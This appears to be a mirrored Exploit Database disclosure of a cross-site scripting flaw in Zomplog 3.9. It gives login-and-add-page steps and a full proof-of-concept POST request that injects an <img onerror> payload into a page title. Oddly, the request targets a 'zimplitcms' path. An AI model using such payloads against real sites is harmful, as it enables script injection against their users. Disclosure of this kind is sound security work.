Zomplog 3.9 – Cross-site scripting (XSS)

• Exploit Database
• 22 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-07-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51625/

• Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
  Application: Zomplog
  Version: v3.9
  Bugs:XSS
  Technology: PHP
  Vendor URL: http://zomp.nl/zomplog/
  Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
  Date of found: 22.07.2023
  Author: Mirabbas Ağalarov
  Tested on: Linux 
  
  
  2. Technical Details & POC
  ========================================
  steps: 
  1. Login to account
  2. Add new page
  3. Set as <img src=x onerror=alert(4)>
  4. Go to menu
  
  Poc request:
  
  POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
  Host: localhost
  Content-Length: 11
  sec-ch-ua: 
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
  sec-ch-ua-platform: ""
  Origin: http://localhost
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
  Connection: close
  
  empty=empty